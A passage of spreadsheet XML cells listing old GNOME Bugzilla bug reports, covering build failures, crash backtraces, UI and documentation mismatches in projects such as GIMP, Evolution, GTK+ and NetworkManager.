------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-01-13 08:25 -------
Unknown version 1.0.x in product libgtop. Setting version to the default unspecified.
Reassigning to the default owner of the component martin@gnome.org.
</t>
  </si>
  <si>
    <t>GSTREAMER-393461</t>
  </si>
  <si>
    <t>[Real] Location of .so varies on each distribution</t>
  </si>
  <si>
    <t>Currently the Real plugin has hardcoded values for the location of the wrapped .so .
The problem is those path vary from distribution to distribution. We need to find a better way to set the default paths at compile time so packagers can properly set those.</t>
  </si>
  <si>
    <t>GIMP-335130</t>
  </si>
  <si>
    <t>PSD plug-ins not 64bit safe</t>
  </si>
  <si>
    <t>Please describe the problem:
Opening '/home/marc/qsl-card.psd' failed:
Plug-In could not open image
You can create a PSD file using GIMP but once you save it then exit gimp then
startup gimp again you cannot open the PSD again it gives the above error.
Steps to reproduce:
1. create psd save it 
2. exit gimp
3. startup gimp try to load the psd 
Actual results:
gimp fails to open the psd file 
Plug-In could not open image
Expected results:
Plug-In could not open image
Does this happen every time?
yes
Other information:
platform is gentoo linux 64 bit</t>
  </si>
  <si>
    <t>mark.price13</t>
  </si>
  <si>
    <t>NETWORKMANAGER-349944</t>
  </si>
  <si>
    <t>Renaming a VPN connection is not handled properly</t>
  </si>
  <si>
    <t>Please describe the problem:
If when editing a connection the name is changed firstly the nm-vpn-properties dialog doesn't see the change until you exit an go back in.
Secondly a stub is left behind in gconf   (system/networking/vpn_connections/ESCAPED_CONNECTION_NAME) belonging to the connections old name.  The stub cannot be deleted via the interface and it's existence prevents a new connection with that name from being created.
Steps to reproduce:
1. Create a connection end exit the vpn-properties tool
2. Go back and edit the connection and change the name
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GPARTED-347528</t>
  </si>
  <si>
    <t>impossible to mount vfat</t>
  </si>
  <si>
    <t>Please describe the problem:
fat32 partition is not mounted because missing charset iso8859-1
error msg: unable to load NLS charset iso8859-1
Tested with English and Czech Lang selected while booting...
Steps to reproduce:
1. mount -t vfat /dev/hda1 /root/d
2. 
3. 
Actual results:
partition is not mounted because missing charset iso8859-1
error msg: unable to load NLS charset iso8859-1
Expected results:
mount vfat partition
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>GDL-452331</t>
  </si>
  <si>
    <t>autogen better use gnome-autogen.sh</t>
  </si>
  <si>
    <t>Please describe the problem:
autogen will genenrate following error better simply use gnome-autogen.sh
checking for bind_textdomain_codeset... (cached) yes
checking for msgfmt... /usr/bin/msgfmt
checking for dcgettext... yes
checking if msgfmt accepts -c... no
checking for gmsgfmt... /usr/bin/msgfmt
checking for xgettext... /opt/jdsbld/bin/xgettext
checking for bind_textdomain_codeset... (cached) yes
configure: creating ./config.status
config.status: error: cannot find input file: Makefile.in
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-309958</t>
  </si>
  <si>
    <t>gnomine</t>
  </si>
  <si>
    <t>another build issue</t>
  </si>
  <si>
    <t>Please describe the problem:
Weird. No idea why the tinderbox isn't showing this but my box is. any ideas?
gnomine.c: In function â€˜show_scoresâ€™:
gnomine.c:209: error: â€˜GAMES_SCORES_STYLE_TIMEâ€™ undeclared (first use in this
function)
gnomine.c:209: error: (Each undeclared identifier is reported only once
gnomine.c:209: error: for each function it appears in.)
make[3]: *** [gnomine.o] Error 1
make[3]: Leaving directory `/home/louie/cvs/gnome-games/gnomine'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/home/louie/cvs/gnome-games/gnomine'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/louie/cvs/gnome-games'
make: *** [all] Error 2
Steps to reproduce:
to repro: build from CVS (with gcc4?)
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>MERGEANT-135202</t>
  </si>
  <si>
    <t>Merge similar strings</t>
  </si>
  <si>
    <t>There are some similar strings in mergeant that should be merged to reduce
the number of strings marked for translation.
regs
 Chris</t>
  </si>
  <si>
    <t>GIMP-170140</t>
  </si>
  <si>
    <t>language issue. hungarian?</t>
  </si>
  <si>
    <t>this is stuck in the middle of my english help file. [6.3 improving colors]
== AutomatickÃ© Ãºpravy ÃºrovnÃ­ dosÃ¡hnete vyvolÃ¡nÃ­m nÃ¡stroje ÃšrovnÄ› (
NÃ¡stroje-&gt;NÃ¡stroje barev-&gt;ÃšrovnÄ› v nabÃ­dce obrÃ¡zku) a kliknutÃ­m na tlaÄÃ­tko
Automaticky v jeho dialogu. V oknÄ› obrÃ¡zku uvidÃ­te nÃ¡hled pokud ho chcete
zachovat stisknÄ›te tlaÄÃ­tko BudiÅ¾. TlaÄÃ­tkem ZruÅ¡it  Ãºpravu zruÅ¡Ã­te.==
could i get a translation please?</t>
  </si>
  <si>
    <t>ladopeioer8kr</t>
  </si>
  <si>
    <t>LIBGNOMEDB-106122</t>
  </si>
  <si>
    <t>Implement --with-html-dir option</t>
  </si>
  <si>
    <t>The target directory when installing the HTML configuration should be tunnable (it is for most gnome packages). This should be done with a --with-html-dir option to be compatible with other packages and should default to $(datadir)/gtk-doc/html.</t>
  </si>
  <si>
    <t>GTK+-148035</t>
  </si>
  <si>
    <t>enum trailing comma patch</t>
  </si>
  <si>
    <t>The IBM C compiler does not like a trailing comma after the last enum constant.</t>
  </si>
  <si>
    <t>GTRANSLATOR-132673</t>
  </si>
  <si>
    <t>problem with error message Please enter your name!</t>
  </si>
  <si>
    <t>From the Debian BTS (http://bugs.debian.org/228146):
If Author's name is empty then I get an error Please enter your name!
The error doesn't disapear when I click OK I think it should.</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-336763</t>
  </si>
  <si>
    <t>The game timer does not advance after using the hint option.</t>
  </si>
  <si>
    <t>Please describe the problem:
The game timer stops if the first action in a new game is Hint (Game -&gt; Hint).
Steps to reproduce:
1. Start a new game : Game -&gt; New
2. Game -&gt; Hint
3. Continue playing
Actual results:
The timer stops at 30 sec. Progress happens only on subsequent hints .
Expected results:
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>ORCA-352578</t>
  </si>
  <si>
    <t>unchecking speech does not disable speech</t>
  </si>
  <si>
    <t>Please describe the problem:
If I uncheck the use of speech in the orca config ui speech is still enabled
Steps to reproduce:
1. Bring up the orca config ui
2. uncheck speech
3. press OK
Actual results:
Speech is still enabled
Expected results:
Speech should be disabled but braille or mag should still work if they are enabled
Does this happen every time?
yes
Other information:
This is with the latest orca from cvs as of 8/23</t>
  </si>
  <si>
    <t>EVOLUTION-253249</t>
  </si>
  <si>
    <t>the search text field does not accept '8' and '9'</t>
  </si>
  <si>
    <t>The search text field simply refuses to accept the numbers 8 and 9 to be
searched for.
Steps to reproduce the problem:
- search for any mails that contain '8'
Actual Results:
- you cannot search for this
Expected Results:
- *sigh*
How often does this happen? 
- reproducable on multiple machines/versions
Checked this versions:
 evolution-1.4.5.0.200401210601-0.snap.ximian.6.1
 evolution-1.4.5-0.ximian.6.0</t>
  </si>
  <si>
    <t>EVOLUTION-339626</t>
  </si>
  <si>
    <t>Wrong icons used for trash in mailer UI</t>
  </si>
  <si>
    <t>In some places the wrong icon is being used as a trash icon as the stock delete icons in GTK+ are trash cans but this is not true in all themes. The attached patches fixes the UI to do the following:
Remove the undelete icon from the menu item (it is not in the toolbar)
Update several icons that were using GTK_STOCK_DELETE to use the gnome trash icons
We probably should also change Delete to Move to Trash in the menus but I think this can wait as it breaks string freeze. However doing this will improve the consistency with Nautilus and also more directly show the behavior of deleting mail. Delete Folder should still use the delete icon as it is actually non-recoverable.</t>
  </si>
  <si>
    <t>GTK+-150502</t>
  </si>
  <si>
    <t>_NET_WM_USER_TIME support is incomplete</t>
  </si>
  <si>
    <t>gtk_window_present doesn't update the _NET_WM_USER_TIME field for the window
(unless the window is already visible) with the result that the window can
appear without focus and behind the focused window with the current metacity
behavior.
gdk_window_focus passes a _NET_ACTIVE_WINDOW message but uses the old form of
the spec for xevent data.  In particular it neglects to pass a timestamp which
Metacity needs.
I will attach a patch momentarily that fixes both issues.</t>
  </si>
  <si>
    <t>YELP-431078</t>
  </si>
  <si>
    <t>handle cross-references a bit better</t>
  </si>
  <si>
    <t>This patch addresses two issues:
1) foo (1) is not treated as a link 
2) foo(3p) is not treated as a link</t>
  </si>
  <si>
    <t>EVOLUTION-620185</t>
  </si>
  <si>
    <t>should reply with the address from To: field (if sending from this address is enabled)</t>
  </si>
  <si>
    <t>[Sorry if this report isn't as accurate as it should be. Please don't hesitate to ask if I don't explain myself clearly.]
I have configured evolution with some accounts. Some of them are standard email accounts in which I can both receive and send messages. But some other accounts are only forwarding addresses that I configured only to send messages (using Sendmail).
The issue if I receive a message to the forwarding address if I reply I get the reply not from the forwarding address but from the real address. Since sending messages is enabled from the forwarding account Replies should be sent from the forwarding address since it has been configured to send messages through Sendmail.
Maybe an example would be simpler. Imagine I have a pr@users.sf.net forwarding address directed to pr@gmail.com. Those messages sent to @users.sf.net are forwarded to @gmail.com so Evolution receives the message in the gmail.com account. But if the pr@users.sf.net account is configured only to send messages using Sendmail the reply should be from @users.sf.net instead of @gmail.com. (I don't remember which one but this was the functioning in previous versions.)
Would you be so kind to fix this?
Thanks
Pablo</t>
  </si>
  <si>
    <t>EVOLUTION-741059</t>
  </si>
  <si>
    <t>Prompts for login PIN for PKCS#11 module with CKF_PROTECTED_AUTHENTICATION_PATH</t>
  </si>
  <si>
    <t>If a module sets CKF_PROTECTED_AUTHENTICATION_PATH in the flags returned from C_GetTokenInfo() you're not supposed to prompt the user for a PIN for it. You're supposed to let *it* handle its own login. Perhaps it'll have a built-in keypad or something.
The GNOME Keyring module does this because it's automatically unlocked at login time. But Evolution prompts for a PIN for it anyway.
On a modern Fedora system symlink /usr/lib64/libnssckbi.so to p11-kit-proxy.so (instead of p11-kit-trust.so). This will make p11-kit actually work properly and link in *all* the configured modules and then you'll see that Evolution prompts for a PIN while Firefox correctly doesn't.</t>
  </si>
  <si>
    <t>GNOME-CORE-32915</t>
  </si>
  <si>
    <t>problem with selection on gnome-terminal</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-terminal
Version: gnome-core-1.2.2-0_helix_1
Setup: redhat-6.2 + updates + latest HelixCode for RedHat_6
Symptom: impossible to select when having scrolled up
How to reproduce:
  very simple get so history in the gnome-terminal then scroll up
with Shift-PageUp.
  When trying to select there seems to be a computation error. First
when starting to click the selection is extended from the current point to
the top of the window. Then the view of the windows scrolls up as the
mouse moves making the selection impossible because whatever you're trying
to select becomes a moving target. Very annoying ...
  This does not happen in the bottom view i.e. if one didn't scroll up
first to egt some of the history.
Daniel
-- 
Daniel.Veillard@w3.org | W3C INRIA Rhone-Alpes  | libxml Gnome XML toolkit
Tel : +33 476 615 257  | 655 avenue de l'Europe | http://xmlsoft.org/
Fax : +33 476 615 207  | 38330 Montbonnot FRANCE | Rpmfind search site
 http://www.w3.org/People/all#veillard%40w3.org  | http://rpmfind.net/
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 15:18 -------
This bug was previously known as bug 32915 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=32915
Originally filed under the gnome-core product and gnome-terminal component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (Daniel.Veillard@w3.org) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>Daniel.Veillard</t>
  </si>
  <si>
    <t>GSTREAMER-734661</t>
  </si>
  <si>
    <t>avviddec: After draining frames flush the libav decoder</t>
  </si>
  <si>
    <t>Call libav's flush function after draining the decoder to make sure there's no stale undecoded data left.</t>
  </si>
  <si>
    <t>GNUMERIC-92913</t>
  </si>
  <si>
    <t>AIX compiler does not support string declaration with dynamic size</t>
  </si>
  <si>
    <t>In file plugins/fn-complex/functions.c : 
In function value_new_complex() :
On AIX with xlC compiler the following declaration is not supported
(because of the use of strlen()):
char f[5 + 4 * size(int) + strlen(GNUM_FORMAT_g) ]
Is it possible to replace this by calls to g_malloc() (and g_free()) to
improve compatibility with xlC compiler?
{  ...
   char *f
   f = g_malloc(5 + 4 * size(int) + strlen(GNUM_FORMAT_g))
   ...
   g_free(f)
}
Thank you.
Benjamin</t>
  </si>
  <si>
    <t>GNOME-CORE-61060</t>
  </si>
  <si>
    <t>Pnel crashes when starting gnomeicu</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.4
Synopsis: Pnel crashes when starting gnomeicu
Class:    sw-bug
Distribution: Red Hat Linux release 7.1 (Seawolf)
System: Linux 2.4.2-2 i686 unknown
C library: glibc-2.2.2-10
C compiler: 2.96
glib: 1.2.9
GTK+: 1.2.9
ORBit: ORBit 0.5.7
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25-9
gnome-core: gnome-core 1.2.4
Description:
Everytime I start gnomeicu from a shell the panel crahses immediatly.
I've no idea if this informtaion is useful for you but GNOME asked me
to report this...
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x40632519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x40632519 in __wait4 () from /lib/i686/libc.so.6
#1  0x406a29e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x401767e8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x0805800f in size_change () at eval.c:41
#5  0x08078d76 in load_queued_externs () at eval.c:41
#6  0x4002f551 in _ORBIT_skel_GNOME_PanelSpot_register_us () at eval.c:41
#7  0x4006b10a in ORBit_POA_handle_request () at eval.c:41
#8  0x4006dff7 in CORBA_ORB_run () at eval.c:41
#9  0x4006e2ef in CORBA_ORB_run () at eval.c:41
#10 0x40087e69 in giop_main_handle_connection () at eval.c:41
#11 0x40100659 in orb_handle_connection () from /usr/lib/libgnorba.so.27
#12 0x400a301e in g_io_unix_dispatch () at eval.c:41
#13 0x400a47f3 in g_main_dispatch () at eval.c:41
#14 0x400a4dd9 in g_main_iterate () at eval.c:41
#15 0x400a4f8c in g_main_run () at eval.c:41
#16 0x402c2803 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#17 0x080560c0 in main () at eval.c:41
#18 0x40594177 in __libc_start_main (main=0x8055db0  argc=3 
    ubp_av=0xbffff9ac init=0x8053398  fini=0x809370c  
    rtld_fini=0x4000e184  stack_end=0xbffff99c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40632519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x406a29e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x401767e8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x0805800f in size_change () at eval.c:41
	in eval.c
ap = (void **) 0x814f218
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x8148128 0[\024\bH\017j@
result = 135590424
result = 135561512
#5  0x08078d76 in load_queued_externs () at eval.c:41
41	in eval.c
ap = (void **) 0xbffff6f0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x8148128 0[\024\bH\017j@
result = 3221223152
result = 135561512
#6  0x4002f551 in _ORBIT_skel_GNOME_PanelSpot_register_us () at eval.c:41
41	in eval.c
ap = (void **) 0xbffff6f0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x80b3cd8 ÃÃ\023\b
result = 3221223152
result = 134954200
#7  0x4006b10a in ORBit_POA_handle_request () at eval.c:41
41	in eval.c
ap = (void **) 0xbffff6f0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x80b3cd8 ÃÃ\023\b
result = 3221223152
result = 134954200
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-24 12:07 -------
The original reporter (alexandergilberg@hotmail.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>alexandergilberg</t>
  </si>
  <si>
    <t>NAUTILUS-89422</t>
  </si>
  <si>
    <t>Docs claim Nautilus can browse the web</t>
  </si>
  <si>
    <t>Introduction to Nautilus File Manager section (1.1) 
says you can use Nautilus for web browsing but you can't
at the moment.</t>
  </si>
  <si>
    <t>GUCHARMAP-354101</t>
  </si>
  <si>
    <t>must not conditionally use GNOME_DOC_INIT</t>
  </si>
  <si>
    <t>http://cvs.gnome.org/bonsai/cvsquery.cgi?branch=&amp;dir=gucharmap&amp;who=behdad&amp;date=explicit&amp;mindate=2006-09-02%2019:59&amp;maxdate=2006-09-02%2020:01
(from bug 332880)
GNOME_DOC_INIT uses AM_CONDITIONAL and therefore must not be used conditionally.</t>
  </si>
  <si>
    <t>GTK+-485887</t>
  </si>
  <si>
    <t>Second call of GTK_WIDGET_SET_FLAGS (widget REALIZED) in gtk_socket_realize().</t>
  </si>
  <si>
    <t>EPIPHANY-115377</t>
  </si>
  <si>
    <t>Context menu offers 'copy email address' for a link</t>
  </si>
  <si>
    <t>Hover the mouse over a link and right click. The context menu will both
have Copy Link Address and Copy Email Address. It should only have one
of those dependent on whether the link is mailto: or not.</t>
  </si>
  <si>
    <t>GTK+-464270</t>
  </si>
  <si>
    <t>ellipsize doesn't work consistent</t>
  </si>
  <si>
    <t>Here's a screenshot of the Gtk API docs made in devhelp where 2 functions beginning with the same text get ellipsized at different positions.</t>
  </si>
  <si>
    <t>EPIPHANY-EXTENSIONS-134320</t>
  </si>
  <si>
    <t>obsolete</t>
  </si>
  <si>
    <t>Allow single popup windows</t>
  </si>
  <si>
    <t>http://bugzilla.mozilla.org/show_bug.cgi?id=198846
A few things needed:
- Copy the concepts from the patch from the bug above
- Will probably have to move ge_popup_blocked signal *out* of Epiphany into
the extension itself
- Might have to change the statusbar behavior. Maybe create a placeholder
GtkContainer in Epiphany for extensions?</t>
  </si>
  <si>
    <t>GNOME-PANEL-94493</t>
  </si>
  <si>
    <t>[Solaris]:Help button does not invoke help window through panel menu-editing.</t>
  </si>
  <si>
    <t>I'm running sun's beta 2 Build 9 version of gnome. dated 17th Sept CVS. 
From panel menu-editing help button does not pops help window.
Steps to reproduce:
1. Choose 'Applications'-&gt;'Accessories'-&gt;'Calculator'-&gt; 
   right click and select 'Properties' 
2. 'Launcher Properties' dialog appears
3. Click on the 'Help' button to get the online help about 
    menu-editing
Expected behaviour:
help window should be opened
Actua behaviour:
nothing happens (It doen't pops any window)</t>
  </si>
  <si>
    <t>GTK+-113980</t>
  </si>
  <si>
    <t>Focus problem with Pages within a GtkNotebook</t>
  </si>
  <si>
    <t>I have a parent notebook with many pages.  Some of the notebook pages
contain child notebooks.  If an external event such as a gtk_timeout
updates a widget in one of the child notebook pages either the tab label
or a widget within the notebook page it seems to stop the other child
notebooks from switching pages via mouse clicks.
To reproduce the problem with the example follow these steps...
1. Click tabs a few times in Page Titled Won't work after going to Page 3
2. Click on Page3 wait for at least 1 update.
3. CLick on Page Titled Won't work after going to Page 3
4. You now cannot change the pages by clicking on the tabs.  Though
ctrl-page(up/down) works after tabbing to get focus.
I apologise for the hack I used to put this togeter I basicly modified the
notebook example that came with gtk+.  I don't have much time and this bug
is interferring with demostration my client is going to be doing in 3 weeks.
Thanks
here is a url
http://kraken.rdrtech.net/gtk_bug/notebook.c
I will attach the file after I submit the bug I don't see an attachment on
this submit page.</t>
  </si>
  <si>
    <t>GNOME-COMMON-315320</t>
  </si>
  <si>
    <t>installer failure for gtk-doc-manual-C.omf.out</t>
  </si>
  <si>
    <t>Please describe the problem:
I'm seeing this build failure:
for file in gtk-doc-manual-C.omf do \
        /home/fitzsim/bin/install-check -m 644 $file.out
/home/fitzsim/install/share/omf/gtk-doc/$file \
done
/usr/bin/install: cannot stat `gtk-doc-manual-C.omf.out': No such file or directory
make[3]: *** [install-data-hook-omf] Error 1
make[3]: Leaving directory `/home/fitzsim/build/gtk-doc-bld/help/manual/C'
I'll attach a patch that fixes the problem.
Steps to reproduce:
1. Attempt to build gtk-doc using JHBuild.
Actual results:
The build fails.
Expected results:
The build should succeed.
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>GNOME-UTILS-143755</t>
  </si>
  <si>
    <t>Crash on removing gdict applet</t>
  </si>
  <si>
    <t>Got this crash after experimenting a bit with a condition that makes it consume
90+% CPU.
(gdb) bt
#0  0x0052a402 in ?? ()
#1  0x005c0ed3 in ?? () from /lib/tls/libpthread.so.0
#2  0x03168442 in libgnomeui_segv_handle (signum=-512) at gnome-ui-init.c:741
#3  
#4  0x0078591f in g_type_check_instance_is_a (type_instance=0x7fbffef7
iface_type=152860488) at gtype.c:3126
#5  0x00b9acb9 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#6  0x0804e1d4 in _start ()
#7  0x092dbfe0 in ?? ()
#8  0x007960bc in ?? () from /usr/lib/libgobject-2.0.so.0
#9  0xfee77718 in ?? ()
#10 0x0077c691 in g_cclosure_marshal_VOID__VOID (closure=0x92dbfe0
return_value=0x9204df8 n_param_values=0
    param_values=0x7fbffef7 invocation_hint=0x9423b70 marshal_data=0xc8) at
gmarshal.c:77</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-91029</t>
  </si>
  <si>
    <t>[Solaris] Inconsistencies in options shown in help manual and actual app</t>
  </si>
  <si>
    <t>Tested on Sun's Gnome 2.0 Beta 2 Build 3 version on a Solaris 9 Sparc 
machine.
Reviewed gnome terminal manual ver 2.0 and found the following mismatch 
between the explanation in the online help manual and the actual GUI.
1) Sec 2.2. : When You First Start GNOME Terminal
Change the screenshot for terminal (Instead of â€˜File Edit Terminal and 
Helpâ€™ options it is â€˜File Edit View Terminal Go and Help option)
2) Sec : 2.4 Working with Multiple Terminals
Figure 2 link broken
3) Figure 2. Example of a Terminal Window with Tabs
 Change the screenshot for Figure 2. Example of a terminal Window with Tabs
4) Sec 3.1: To Open and Close Terminals:
To open a new terminal window:
 1. Choose 'File-&gt;New Window' open new terminal. (Docs)
 But 'File-&gt;New Window' pops up another pop menu .We can select any of the 
option (Default or 1.Default) from that pop menu to create new window.
To Add a new tabbed terminal in the same window:
 2. Choose 'File-&gt;New Tab' open new terminal. (Docs)
 But 'File-&gt;New Tab' pops up another pop menu .We can select any of the    
option (Default or 1.Default) from that pop menu to create new tab.
5)Sec 3.2: To Manage Profiles: To add new profile
Instead of 'Terminal-&gt;New Profile' it is  'Edit-Profile' under 'Edit 
Profiles' window select 'New' button
Terminal-&gt;Manage Profile â€“No such option (Sec 3.2 - To add new profile 
This step (3) is not necessary)
6)Sec 3.2: To Manage Profiles: To add new profile
a)To Edit profile:
Instead of 'Terminal-&gt;Edit current profile' it is 'Edit-&gt;Current 
Profile...'
Instead of 'Terminal-&gt;Manage profile' it is 'Terminal-&gt;Profiles...'
b)To delete a profile
Instead of 'Terminal-&gt;Manage profileâ€™ it is 'Terminal-&gt;Profiles...'
7) Sec 4.1.: General
Font Use this button to specify the default font for the terminal.
Instead of Default: -misc-fixed-medium-r-normal-20-200-75-75-c-100-iso8859-
1.
Shown in the app as: Monospace
Blink Cursor 
Default: unselected.
Shown in the app as: selected
Show menubar by default in new terminals Select this option to show the 
menubar on new terminal windows. Default: unselected. 
Shown in the app as: Selected
Silence terminal bell -&gt;Terminal bell
Default: -A-Za-z0-9./?%&amp;#  -&gt; Default: -A-Za-z0-9./?%&amp;#- &gt;Default: -A-Za-
z0-9./?%&amp;#  
Shown in the app as: -A-Za-z0-9./?%&amp;# :_
Scrolling is in separate tab and is not a part of the GENERAL tab 
Default: Right.
Shown in the app as: On the right side
Scrollback ... kilobytes Use this spin box to specify the number of 
kilobytes that you can scroll back through using the scrollbar. For 
example if you specify 94 you can scroll back through the last 94 
kilobytes displayed in the terminal. 
Default: 168 kilobytes. 
Shown in the app as: 167
Initial title Use this text box to specify the initial title of the 
profile. New terminals that are started from the current terminal have the 
new initial title.
Default: Default. 
Shown in the app as: Terminal
8) Sec 4.3 Colors
Custom colors 
Shown in the app as: Custom 
Use colors from system theme select this option to use colors from the 
system theme. Default: unselected.  
Shown in the app as: Selected
Built in schemes - Terminal Colors
Default: White on black. 
Shown in the app as: unselected
Text color
Default: white. 
Shown in the app as: unselected
Background color
Default: black
Shown in the app as: unselected
9) Sec 4.4. Effects
Darken transparent and image backgrounds 
Shown in the app as: Shade transparent or image background
10) Sec 4.5. Compatibility
Delete key generates
Default: ASCII DEL. 
Shown in the app as: Escape Sequence
11) Sec 4.6. Key Bindings - No such tab in the app.</t>
  </si>
  <si>
    <t>NETWORKMANAGER-523700</t>
  </si>
  <si>
    <t>svn 3486 fails to build due to implicit declaration</t>
  </si>
  <si>
    <t>gcc -DHAVE_CONFIG_H -I. -I.. -I../include -I../libnm-util -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -pthread -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/dbus-1.0 -I/usr/lib/dbus-1.0/include -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -DDBUS_VERSION_MAJOR=1 -DDBUS_VERSION_MINOR=1 -DDBUS_VERSION_MICRO=20 -Wall -Werror -std=gnu89 -march=i686 -mtune=generic -O2 -pipe -Wshadow -Wmissing-declarations -Wmissing-prototypes -Wdeclaration-after-statement -Wfloat-equal -Wno-unused-parameter -Wno-sign-compare -MT libnm_glib_la-nm-client.lo -MD -MP -MF .deps/libnm_glib_la-nm-client.Tpo -c nm-client.c  -fPIC -DPIC -o .libs/libnm_glib_la-nm-client.o
cc1: warnings being treated as errors
nm-client.c: In function â€˜nm_client_activate_connectionâ€™:
nm-client.c:566: warning: passing argument 6 of â€˜org_freedesktop_NetworkManager_activate_connection_asyncâ€™ from incompatible pointer type
nm-client.c: In function â€˜nm_client_get_active_connectionsâ€™:
nm-client.c:600: warning: implicit declaration of function â€˜org_freedesktop_NetworkManager_get_active_connectionsâ€™
make[3]: *** [libnm_glib_la-nm-client.lo] Error 1
make[3]: Leaving directory `/home/baze/pkgs/networkmanager-svn/src/NetworkManager-build/libnm-glib'
make[2]: *** [all] Error 2
make[2]: Leaving directory `/home/baze/pkgs/networkmanager-svn/src/NetworkManager-build/libnm-glib'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/baze/pkgs/networkmanager-svn/src/NetworkManager-build'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>GNOME-APPLETS-87614</t>
  </si>
  <si>
    <t>wireless applet needs new gfx</t>
  </si>
  <si>
    <t>Works only on Linux but should build on any Unix.
Patches below. A couple of problems:
- would need to change the theme (hmm an airport)
- need to change the Ã¸ with the right Unicode char.
- dialogs show up en-masse instead of just once (ie. it's possible to have
multiple about boxes... kinda stinky).</t>
  </si>
  <si>
    <t>GTKHTML-215633</t>
  </si>
  <si>
    <t>Calendar crashed when I tried to view this message (in full description) in evolution mailer</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.99.0
Synopsis: Calendar crashed when I tried to view this message (in full description) in evolution mailer
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Description:
--------------------[cut here]---------------------------------
Received: by [removed] 
        id  Fri 16 Nov 2001 16:42:24
+0100
content-class: urn:content-classes:calendarmessage
Subject: [removed]
MIME-Version: 1.0
Content-Type: multipart/alternative
        boundary=----_=_NextPart_001_01C16EB5.49C6AA10
Date: Fri 16 Nov 2001 16:42:24 +0100
X-MimeOLE: Produced By Microsoft Exchange V6.0.4417.0
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: [removed]
Thread-Index: AcFrSqNAloh1qRXBTPqMrckY72PSRQDaqMjA
From: Poul Bundgaard 
To: Alexei Mikhailov 
        =?iso-8859-1?Q?J=F8rn_Albrektsen?= 
        Lars Christiansen 
        Tom Andersen 
This is a multi-part message in MIME format.
------_=_NextPart_001_01C16EB5.49C6AA10
Content-Type: text/html
        charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
&lt;META HTTP-EQUIV=3DContent-Type CONTENT=3Dtext/html =
charset=3Diso-8859-1&gt;
&lt;META NAME=3DGenerator CONTENT=3DMS Exchange Server version =
6.0.4417.0&gt;
Updated: [removed] weekly project meeting - no with =
recurrence
When: Occurs every tirsdag effective =
13-11-2001 from 14:00 to 15:00 (GMT+01:00) Brussels Copenhagen Madrid
=
Paris.
Where: Konferencerum - 1.sal
*~*~*~*~*~*~*~*~*~*
Weekly project status meeting
Meeting Topics:
General status - (other projects and
=
corporate news)
Planning status - Planned activities
=
resource allocation and changes to or deviations from the =
planned.
Individual status input and =
concerns.
 - Working activities and
=
progress
 - Issues
 - Risks
 - Next weeks =
activities
 - Near term =
milestones/deliverables
To-do list.
Best Regards
Poul
------_=_NextPart_001_01C16EB5.49C6AA10
content-class: urn:content-classes:calendarmessage
Content-Type: text/calendar
        method=REQUEST
        name=meeting.ics
Content-Transfer-Encoding: 8bit
BEGIN:VCALENDAR
METHOD:REQUEST
PRODID:Microsoft CDO for Microsoft Exchange
VERSION:2.0
BEGIN:VTIMEZONE
TZID:GMT +0100 (Standard) / GMT +0200 (Daylight)
BEGIN:STANDARD
DTSTART:16010101T030000
TZOFFSETFROM:+0200
TZOFFSETTO:+0100
RRULE:FREQ=YEARLYWKST=MOINTERVAL=1BYMONTH=10BYDAY=-1SU
END:STANDARD
BEGIN:DAYLIGHT
DTSTART:16010101T020000
TZOFFSETFROM:+0100
